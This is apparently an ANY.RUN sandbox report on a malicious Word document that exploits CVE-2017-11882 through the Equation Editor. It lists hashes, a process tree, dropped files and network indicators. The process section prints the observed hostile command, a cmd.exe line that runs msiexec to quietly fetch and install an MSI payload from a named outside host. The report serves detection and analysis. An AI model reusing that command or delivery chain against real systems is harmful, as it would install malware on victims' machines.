analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

aee74807df9fa1312f400f28f6e2af9e.doc

Full analysis: https://app.any.run/tasks/a0a47ded-2f25-4525-b36b-a97c10411a9f
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: February 18, 2019, 23:09:58
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
generated-doc
exploit
CVE-2017-11882
loader
exe-to-msi
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

AEE74807DF9FA1312F400F28F6E2AF9E

SHA1:

8600580EA851024E5060D133596B67C9161AF13C

SHA256:

993ACA30290295FEE5B4DA2C7973DCA6347DEE2CB24A6E1B161CDE0B809A996B

SSDEEP:

3072:J7lL2mrdFADYhDFc8rpKSvNYbWRDzUyRBelYc3nTMSFm9d+tlKCwP:J7lCAdFkYhDFBxvqyRmTMSFmfSs

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 2880)
    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 284)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 2372)
  • SUSPICIOUS

    • Unusual connect from Microsoft Office

      • WINWORD.EXE (PID: 2952)
    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 284)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 2372)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 2372)
  • INFO

    • Application was crashed

      • EQNEDT32.EXE (PID: 284)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2952)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2952)
    • Application was dropped or rewritten from another process

      • MSI63E9.tmp (PID: 2216)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 2372)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 2372)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x2ea8411c
ZipCompressedSize: 351
ZipUncompressedSize: 1364
ZipFileName: [Content_Types].xml

XML

Template: template.dotx
TotalEditTime: -
Pages: 1
Words: -
Characters: 1
Application: Microsoft Office Word
DocSecurity: None
Lines: 1
Paragraphs: 1
ScaleCrop: No
HeadingPairs:
  • Title
  • 1
TitlesOfParts: -
Company: -
LinksUpToDate: No
CharactersWithSpaces: 1
SharedDoc: No
HyperlinksChanged: No
AppVersion: 15
Keywords: -
LastModifiedBy: Richard
RevisionNumber: 2
CreateDate: 2019:02:17 21:39:00Z
ModifyDate: 2019:02:17 21:39:00Z

XMP

Title: -
Subject: -
Creator: Windows User
Description: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
7
Malicious processes
1
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start winword.exe eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe eqnedt32.exe no specs msi63e9.tmp no specs

Process information

PID
CMD
Path
Indicators
Parent process
2952"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\aee74807df9fa1312f400f28f6e2af9e.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
284"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2880cmd.exe & /C CD C: & msiexec.exe /i http://amazonvietnampharma.com.vn/l/css/baba.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3380msiexec.exe /i http://amazonvietnampharma.com.vn/l/css/baba.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2372C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2612"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEsvchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2216"C:\Windows\Installer\MSI63E9.tmp"C:\Windows\Installer\MSI63E9.tmpmsiexec.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 526
Read events
1 057
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
27
Text files
15
Unknown types
5

Dropped files

PID
Process
Filename
Type
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6A92.tmp.cvr
MD5:
SHA256:
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{CC0561E0-7164-44C6-9F13-272D979B6FA5}
MD5:
SHA256:
2952WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B96929CE.jpeg
MD5:
SHA256:
2952WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:6C3A26A298C70CD61C1986CD33220E68
SHA256:7A6FF88FBCE1B2C280852428E4C8F4968DA16C34F03C04BB74BB5622AA1AAD3D
2952WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSDbinary
MD5:DAB16CE66AAA410979940C3DD0249A59
SHA256:38EE375FCBAB4D1AAD6D8CC6EF0E88D45BE35E5442846E1E0D4735BB123104F4
2952WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{192F4391-1CD7-4A2D-9606-2D57D831C8E6}.FSDbinary
MD5:A82AE47C8246B65916CF136EFCA32F93
SHA256:0E08955FDEE02F6936DB8BDEE19A970D3862640C858637A7197AA159C435378E
2952WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSDbinary
MD5:E6BC24A884731B6B8EEB24FA69C05245
SHA256:6129A92B8F00B04D2D7F22C0BF08B49973044B0EB330EDC2DE271063FB4A8749
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{57306285-5227-40AF-B590-B49D55C4FCF2}binary
MD5:472AE6BFE7B663A4B86441F67357D1D6
SHA256:FC14E1DD8A9694AE729E4D5B8F9CC070477749A7FFB1C6E7C17E3A21FE345310
2952WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSFbinary
MD5:2F24560F2CBAF0074396396050A19448
SHA256:F8C6C3F74CBE772B10031E01974F8EFF44D6BA3E315B5E4C339AAD186811E47D
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$e74807df9fa1312f400f28f6e2af9e.docpgc
MD5:8827F174A674F3C5F3BF0336ADE48E37
SHA256:436477E5C524879B60B76546BA412597BBBA094F1E94FF0DF464C4BCE7BAE148
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
5
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2952
WINWORD.EXE
OPTIONS
405
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/
VN
html
231 b
suspicious
2952
WINWORD.EXE
GET
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/css.doc
VN
text
56.4 Kb
suspicious
2372
msiexec.exe
GET
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/baba.msi
VN
executable
656 Kb
suspicious
980
svchost.exe
OPTIONS
405
115.146.122.229:80
http://amazonvietnampharma.com.vn/
VN
html
225 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2372
msiexec.exe
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious
980
svchost.exe
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious
2952
WINWORD.EXE
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious

DNS requests

Domain
IP
Reputation
amazonvietnampharma.com.vn
  • 115.146.122.229
suspicious

Threats

PID
Process
Class
Message
2372
msiexec.exe
Potential Corporate Privacy Violation
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
2372
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
2372
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
1 ETPRO signatures available at the full report
No debug info